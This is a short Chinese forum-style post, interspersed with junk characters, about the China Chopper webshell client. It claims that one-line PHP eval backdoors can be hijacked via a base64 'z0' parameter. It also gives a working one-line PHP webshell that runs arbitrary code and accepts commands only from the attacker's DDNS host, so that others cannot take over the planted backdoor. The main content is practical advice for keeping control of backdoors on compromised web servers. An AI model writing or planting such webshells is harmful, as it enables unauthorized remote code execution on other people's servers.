今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞4 B4 z( D7 y3 P
! Y# ^1 n8 ?3 Z: `3 }
就算你设置了密码,使用了eval($_REQUEST['moyo']);( a5 A% O3 k% E! }' w
9 X; G: w: Q1 N7 C, a5 R
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
& i/ f3 d" o1 H2 W% l' ]7 ?2 H) m3 y. k1 o+ `$ W
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));/ g/ K* k6 P$ [* F
7 ~" R! t% u; N& i: ~直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了$ P% [5 ]/ M# D) [7 S' C* N
" `+ ?6 S9 [9 i* o7 h1 H
不知道是设计缺陷还是故意留的后门
: e2 X2 \. d/ M1 E+ p5 d( s9 C9 G! w
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
" [6 d I" B. l6 P/ e7 g/ |2 C/ }
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
% s: D; s5 p W: Y7 Q2 _! w' e1 O a9 o9 A
然后一句话后门这样写
" w1 c' d& t, G" [" X% e2 H7 Q' v2 }8 a
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
: j( B( ^- i) A3 d这样就可以让一句话后门只允许自己的电脑连接了
" i& A3 h) [4 k8 b z
) c& a$ |2 f+ X- C0 x2 z8 ^- @ |